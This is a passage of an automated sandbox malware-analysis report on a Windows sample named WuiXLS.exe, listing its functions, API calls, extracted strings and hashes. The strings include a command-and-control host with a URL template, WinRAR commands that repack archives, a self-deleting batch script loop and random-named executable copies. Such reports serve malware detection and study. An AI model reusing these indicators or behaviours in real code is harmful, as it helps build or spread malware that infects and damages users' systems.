                                          control_flow_graph 535 70239d-7023d6 strstr 536 702451-70247a CreateFileA GetFileSize 535->536 537 7023d8-7023e2 535->537 538 702480-702483 536->538 539 702675-702676 CloseHandle 536->539 540 7023ed-7023f1 537->540 538->539 541 702489-702493 538->541 542 70267c-702681 RemoveDirectoryA 539->542 543 7023f3-70241d 540->543 544 7023e4-7023ec 540->544 541->539 545 702499-70254b call 701915 CloseHandle memset strrchr wsprintfA strrchr memset * 2 wsprintfA Sleep call 70189d 541->545 546 702687-70268f 542->546 543->536 547 70241f-702425 543->547 544->540 545->542 556 702551-702556 545->556 549 702427-702436 547->549 550 70243a-702443 547->550 549->547 553 702438 549->553 550->546 551 702449 550->551 551->536 553->536 556->542 557 70255c-70261c Sleep memset wsprintfA call 7029e2 memset wsprintfA Sleep call 70189d Sleep CreateFileA call 701915 CloseHandle 556->557 557->542 564 70261e-702626 557->564 564->542 565 702628-70262c 564->565 566 702634-702640 565->566 567 70262e-702632 565->567 568 702641-702665 SetFilePointer WriteFile 566->568 567->568 568->542 569 702667-702673 SetEndOfFile 568->569 569->542
                                          APIs
                                          • strstr.MSVCRT ref: 007023CC
                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00702464
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00702472
                                          • CloseHandle.KERNEL32(?,00000000,00000000), ref: 007024A8
                                          • memset.MSVCRT ref: 007024B9
                                          • strrchr.MSVCRT ref: 007024C9
                                          • wsprintfA.USER32 ref: 007024DE
                                          • strrchr.MSVCRT ref: 007024ED
                                          • memset.MSVCRT ref: 007024F2
                                          • memset.MSVCRT ref: 00702505
                                          • wsprintfA.USER32 ref: 00702524
                                          • Sleep.KERNEL32(000007D0), ref: 00702535
                                          • Sleep.KERNEL32(000007D0), ref: 0070255D
                                          • memset.MSVCRT ref: 0070256E
                                          • wsprintfA.USER32 ref: 00702585
                                          • memset.MSVCRT ref: 007025A6
                                          • wsprintfA.USER32 ref: 007025CA
                                          • Sleep.KERNEL32(000007D0), ref: 007025D0
                                          • Sleep.KERNEL32(000007D0,?,?), ref: 007025E5
                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007025FC
                                          • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00702611
                                          • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00702642
                                          • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0070265B
                                          • SetEndOfFile.KERNEL32 ref: 0070266D
                                          • CloseHandle.KERNEL32(00000000), ref: 00702676
                                          • RemoveDirectoryA.KERNEL32(?), ref: 00702681
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                          • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2203340711-1636733187
                                          • Opcode ID: 3c56a75dc5a52adb78f01fb0024f7433829eabc3a855dfcc84788594bccd3f26
                                          • Instruction ID: 955c8496260bbaa6816cfd464f147f66f206a1c755294994f12ed52d1d719376
                                          • Opcode Fuzzy Hash: 3c56a75dc5a52adb78f01fb0024f7433829eabc3a855dfcc84788594bccd3f26
                                          • Instruction Fuzzy Hash: DF8190B2504344EBD710EF60DC49FABB7ECFB84704F00461AF644D21D1DB789A4A8B6A
                                          Function 0070274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00702766
                                          • memset.MSVCRT ref: 00702774
                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00702787
                                          • wsprintfA.USER32 ref: 007027AB
                                            • Part of subcall function 0070185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00701118), ref: 00701867
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701878
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701880
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701890
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701894
                                          • wsprintfA.USER32 ref: 007027C6
                                          • CopyFileA.KERNEL32(?,00704C80,00000000), ref: 007027D4
                                          • wsprintfA.USER32 ref: 007027F4
                                            • Part of subcall function 00701973: PathFileExistsA.KERNELBASE(\Np`Np,00000000,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 00701992
                                            • Part of subcall function 00701973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 007019BA
                                            • Part of subcall function 00701973: Sleep.KERNEL32(00000064), ref: 007019C6
                                            • Part of subcall function 00701973: wsprintfA.USER32 ref: 007019EC
                                            • Part of subcall function 00701973: CopyFileA.KERNEL32(?,?,00000000), ref: 00701A00
                                            • Part of subcall function 00701973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00701A1E
                                            • Part of subcall function 00701973: GetFileSize.KERNEL32(?,00000000), ref: 00701A2C
                                            • Part of subcall function 00701973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00701A46
                                            • Part of subcall function 00701973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00701A65
                                          • DeleteFileA.KERNEL32(?,?,00704E54,00704E58), ref: 0070281A
                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00704E54,00704E58), ref: 00702832
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                          • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                          • API String ID: 692489704-3642343254
                                          • Opcode ID: d6003e1e7ca818d739bdc3c361eac477336369eeb8862def93dec743e563c984
                                          • Instruction ID: cf9c4baa759ee57fb2220b9c12530ea4b0629ae49dfdfb36d9d5981d451eda9f
                                          • Opcode Fuzzy Hash: d6003e1e7ca818d739bdc3c361eac477336369eeb8862def93dec743e563c984
                                          • Instruction Fuzzy Hash: E6212FF694021CFBEB10E7A49C89EDB77ACEB04744F4046A1B644E20C2E6789F448AA4
                                          Function 00701581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0070185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00701118), ref: 00701867
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701878
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701880
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701890
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701894
                                          • wsprintfA.USER32 ref: 007015AA
                                          • wsprintfA.USER32 ref: 007015C6
                                          • lstrlen.KERNEL32(?), ref: 007015D2
                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 007015EE
                                          • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00701609
                                          • CloseHandle.KERNEL32(00000000), ref: 00701612
                                          • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0070162D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                          • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WuiXLS.exe$open
                                          • API String ID: 617340118-1033353869
                                          • Opcode ID: a153dea90508d003ee962c787ef7fce64f93edffc5c3c0cccf1bc6e356ca50b5
                                          • Instruction ID: edd2c95acc6e9fa887483552a3d45a559e7473e98d1f4e7328b38ee5eea2ca70
                                          • Opcode Fuzzy Hash: a153dea90508d003ee962c787ef7fce64f93edffc5c3c0cccf1bc6e356ca50b5
                                          • Instruction Fuzzy Hash: ED1177B2A0112CFFD72097A5DC89DEB7BACEF59750F004251F649E2080DE789B848BB0
                                          Function 0070120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00701400), ref: 00701226
                                          • GetProcAddress.KERNEL32(00000000), ref: 0070122D
                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00701400), ref: 0070123F
                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00701400), ref: 00701250
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,00701400), ref: 0070129E
                                          • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,00701400), ref: 007012B0
                                          • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,00701400), ref: 007012F5
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00701400), ref: 0070130A
                                          Strings
                                          • ZwQuerySystemInformation, xrefs: 00701212
                                          • ntdll.dll, xrefs: 00701219
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 00701262
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe$ZwQuerySystemInformation$ntdll.dll
                                          • API String ID: 1500695312-1797695780
                                          • Opcode ID: ee63abdb11f4009a676e4e3587886a4f20ce0e515abc60446fbcda3c091de9fb
                                          • Instruction ID: 7f69a1524647713a8d2c3b026fb14f25efef513a934f2e1f3f86708e3a110271
                                          • Opcode Fuzzy Hash: ee63abdb11f4009a676e4e3587886a4f20ce0e515abc60446fbcda3c091de9fb
                                          • Instruction Fuzzy Hash: E421D571705311EBD7209B65CC08B6BBAEDFB89B01F804B19F545D62C0D778DA44C7A9
                                          Function 00701000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGp,http://%s:%d/%s/%s,007010E8,?), ref: 00701018
                                          • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76C08400), ref: 00701029
                                          • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00701038
                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0070104B
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00701075
                                          • CloseHandle.KERNEL32(?), ref: 0070108B
                                          • CloseHandle.KERNEL32(00000000), ref: 0070108E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                          • String ID: HGp$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                          • API String ID: 1223616889-2904897572
                                          • Opcode ID: 46827b8024e012a84d000dab7db8cc7d36bc6cca312774f86f6ac8a14b5b1d15
                                          • Instruction ID: 1619958b9df170cf1e362f4c0083a8ad8c46523b2dfb460312c947177bd3ab9a
                                          • Opcode Fuzzy Hash: 46827b8024e012a84d000dab7db8cc7d36bc6cca312774f86f6ac8a14b5b1d15
                                          • Instruction Fuzzy Hash: F30184B150125CFFE7305F609C88E2BBBEDDB44799F008729F285A2090DA785E448B64
                                          Function 0070189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 007018B1
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75570F00,76C08400), ref: 007018D3
                                          • CloseHandle.KERNEL32(I%p), ref: 007018E9
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007018F0
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00701901
                                          • CloseHandle.KERNEL32(?), ref: 0070190A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                          • String ID: I%p
                                          • API String ID: 876959470-956092038
                                          • Opcode ID: 8078c33404785d45c064edda1878f18aa956689c5366c4c138bb241dbf9b8a12
                                          • Instruction ID: 759f6072cb9142cbe764d8711ee18485a0307376a234153d1e44e908e31db793
                                          • Opcode Fuzzy Hash: 8078c33404785d45c064edda1878f18aa956689c5366c4c138bb241dbf9b8a12
                                          • Instruction Fuzzy Hash: D5017172901168FBCB216BD6DC48DDF7F7EEF85720F108221F915A51A0D6355A18CAA0
                                          Function 0070185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00701118), ref: 00701867
                                          • srand.MSVCRT ref: 00701878
                                          • rand.MSVCRT ref: 00701880
                                          • srand.MSVCRT ref: 00701890
                                          • rand.MSVCRT ref: 00701894
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Timerandsrand$FileSystem
                                          • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                          • API String ID: 4106363736-3273462101
                                          • Opcode ID: 3d04c720fb9a01ad926d19519217ac32bdf1e4f3fffe5d7a068494fb3e645aee
                                          • Instruction ID: c404958feded1805ef498a45b7c051c807602d8add6d7106363dc8490b148744
                                          • Opcode Fuzzy Hash: 3d04c720fb9a01ad926d19519217ac32bdf1e4f3fffe5d7a068494fb3e645aee
                                          • Instruction Fuzzy Hash: 51E0D877A0021CFFE700A7F9EC8689EBBACDE84161B104627F600D3250E974FD448AB8
                                          Function 00702692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7556E800,?,?,007029DB,?,00000001), ref: 007026A7
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,7556E800,?,?,007029DB,?,00000001), ref: 007026B5
                                          • lstrlen.KERNEL32(?), ref: 007026C4
                                          • ??2@YAPAXI@Z.MSVCRT ref: 007026CE
                                          • lstrcpy.KERNEL32(00000004,?), ref: 007026E3
                                          • lstrcpy.KERNEL32(?,00000004), ref: 0070271F
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0070272D
                                          • SetEvent.KERNEL32 ref: 0070273C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                          • String ID:
                                          • API String ID: 41106472-0
                                          • Opcode ID: 06b9f75ae85fab01c0a170bacf655562c5058b5ab0d3b8adce2b2d4993541da5
                                          • Instruction ID: ade7315795ca25285b1e6d7d8d91136b9d2830ff7353c5f887f9bc98664637d7
                                          • Opcode Fuzzy Hash: 06b9f75ae85fab01c0a170bacf655562c5058b5ab0d3b8adce2b2d4993541da5
                                          • Instruction Fuzzy Hash: 1A118EB7501100EFCB219F24EC4C85A7BEEFB84720710C315FA54872A1DBBC8986DB68
                                          Function 00701B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • .exe, xrefs: 00701C57
                                          • cnKCTRfwlhhevYIYOZFRKoMoPBbETAyNStrGbzcWQIXVEtdnJFTZWfGuLHWuAKmUmFVetLDmsEPOjUQaBZhYGIRnvPsQizOfyyXCuXpSiNkDaxwdqosjlrwviBJNLHzqpecxAVxlCrdjMbkpJMgDHaSqkgUg, xrefs: 00701B8A, 00701B9C, 00701C15, 00701C49
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: lstrcatmemcpymemsetrandsrand
                                          • String ID: .exe$cnKCTRfwlhhevYIYOZFRKoMoPBbETAyNStrGbzcWQIXVEtdnJFTZWfGuLHWuAKmUmFVetLDmsEPOjUQaBZhYGIRnvPsQizOfyyXCuXpSiNkDaxwdqosjlrwviBJNLHzqpecxAVxlCrdjMbkpJMgDHaSqkgUg
                                          • API String ID: 122620767-2182911200
                                          • Opcode ID: c8ea0ef2b7f894c0494fe54c0775f9e61aa543e66d831ca375fccbc8fb0bf8e4
                                          • Instruction ID: ce71b66191dbb83d197cdca231e0d0d1657c0b4ebc8ae0ffbd97e01207acbe75
                                          • Opcode Fuzzy Hash: c8ea0ef2b7f894c0494fe54c0775f9e61aa543e66d831ca375fccbc8fb0bf8e4
                                          • Instruction Fuzzy Hash: C92181A3F44190EEE3162335AC84B6A3FC59FE3711F558399F7850B2D3D66C05918268
                                          Function 00701319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00701334
                                          • GetProcAddress.KERNEL32(00000000), ref: 0070133B
                                          • memset.MSVCRT ref: 00701359
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProcmemset
                                          • String ID: NtSystemDebugControl$ntdll.dll
                                          • API String ID: 3137504439-2438149413
                                          • Opcode ID: 8fae5c6585cd390aad0099da095f91817e82826f0a33c31c081896579cb3afc9
                                          • Instruction ID: 127b2efeec6215a772db6adab5d851ab3b4795ff8c0fd2e343364e54db9d55ea
                                          • Opcode Fuzzy Hash: 8fae5c6585cd390aad0099da095f91817e82826f0a33c31c081896579cb3afc9
                                          • Instruction Fuzzy Hash: 70016DB1A0130DFFDB10DF94AC8596FBBACFB45314F00833AF941A2180E6789A05CA55
                                          Function 00701DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: strrchr$lstrcmpilstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3636361484-0
                                          • Opcode ID: a6e0958f350a62b0e98585a6a58c4ca6115358c096b73c2cb98840328d9ca304
                                          • Instruction ID: af1d74f82995d088583af6df948247ad6b3f6e283105687629eaf333ca5e81b7
                                          • Opcode Fuzzy Hash: a6e0958f350a62b0e98585a6a58c4ca6115358c096b73c2cb98840328d9ca304
                                          • Instruction Fuzzy Hash: 7301F9B2904219EFEB205770EC48BDA77DDDB04351F844166EB45E30D0EEBCDA848BA4
                                          Function 00706014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0070603C
                                          • GetProcAddress.KERNEL32(00000000,00706064), ref: 0070604F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: kernel32.dll
                                          • API String ID: 1646373207-1793498882
                                          • Opcode ID: e233b77e120cb45fea95984b5f8f0213f0d8b06c75b1eee0a8bac280b4b94044
                                          • Instruction ID: 4e373522b2b499c335e3bfa30d42a330779fcd99414174a3a0982d3621516ccf
                                          • Opcode Fuzzy Hash: e233b77e120cb45fea95984b5f8f0213f0d8b06c75b1eee0a8bac280b4b94044
                                          • Instruction Fuzzy Hash: 2CF0F0F1140289CFEF708EA4CC44BDE3BE4EF05700F90462AEA09CB281CB7886158B24